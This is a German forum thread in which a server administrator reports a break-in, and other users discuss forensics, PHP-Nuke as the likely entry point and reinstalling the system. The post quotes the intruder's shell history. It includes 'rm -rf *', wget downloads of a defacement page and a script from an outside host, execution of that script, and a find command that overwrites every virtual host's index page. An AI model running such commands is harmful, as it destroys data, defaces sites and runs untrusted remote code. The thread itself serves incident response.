Server ist gehackt worden

[fred feuerstein]

Hallo Leute,

hat mir jemand einen Tipp wie ich ermitteln kann wie sie auf den Server gekommen sind ?? :evil:
Meine logs sind gelöscht . Das rootpassword ist geändert .
Ich habe folgendes in .bash_history gefunden.

id
rm -rf *
ls
locate httpd.conf
cd /var/www/virtual/
ls
cd /tmp
ls
wget http://www.securebi0s.hpg.com.br/index.txt
mv index.txt index.html
find /var/www/virtual/*/htdocs/ -name "index.*" -exec cp /tmp/index.html {} ;
ls
w
wget http://www.securebi0s.hpg.com.br/bi0sinfo.sh
chmod +x bi0sinfo.sh
./bi0sinfo.sh
rm -rf *
ls
pwd

[dodolin]

hat mir jemand einen Tipp wie ich ermitteln kann wie sie auf den Server gekommen sind ?

Deine bash_history zeigt lediglich, wie sie in allen vhosts von Apache die Startseite ersetzt haben, vermutlich so ein Demasking-Wettbewerb, oder wie das heißt... ;)

Es gibt aktuell ne Security-Edition vom Linux-Magazin. Dort ist u.a. ein Artikel überSleuthkit drin. Wenn du keine Logs hast, kein Tripwire oder anderes IDS im Einsatz hast, könnte das deine letzte Chance sein. Ansonsten wirst du wohl im Dunkeln bleiben müssen...

PS: Ich hoffe doch sehr, der Server ist inzwischen im Rescue-Modus?!

[fred feuerstein]

Ja, ich habe den Server gleich in den Rescue-Modus versetzt.

Ich habe aber das Problem das ich erst in ca. 1 Woche einen
Ausweichserver habe.

Ich bin also schwer am überlegen Ihn wieder normal zu starten.

rootpasswort habe ich zurückgesetzt. PHP-Nuke gelöscht.

Ich geh jetzt erst mal schlafen. Vielleicht finde ich ja morgen noch

Spuren.

Das Linux-Magazin werde ich mir auch besorgen.

[dodolin]

PHP-Nuke gelöscht

Wenn das drauf war, ist das schonmal ein ziemlich wahrscheinliches Einfallstor...

[jtb]

na ja, das Script ist relativ simpel..
Es scheint jedenfalls keine Backdoor eingebaut worden sein..
Trotzdem solltest du einen Check darauf machen!

[dodolin]

Es scheint jedenfalls keine Backdoor eingebaut worden sein..

Woher weißt du das?

[darkspirit]

Wie immer in so einem Fall: Statische Daten sichern, Scripte evtl. auch, aber manuell überprüfen, danach Neuinitialisierung.
Man kann sich in keiner Weise darauf verlassen, dass der Angreifer tatsächlich nur das gemacht hat, was in der Bash-History auftaucht.

[Joe User]

Man kann sich in keiner Weise darauf verlassen, dass der Angreifer tatsächlich nur das gemacht hat, was in der Bash-History auftaucht.

ACK, zumal das (fehlerhafte) Script erst nach der "Arbeit" ausgeführt wurde...

[jtb]

Es scheint jedenfalls keine Backdoor eingebaut worden sein..

Woher weißt du das?

ok, es scheint wirklich nur auf dem ersten Blick so..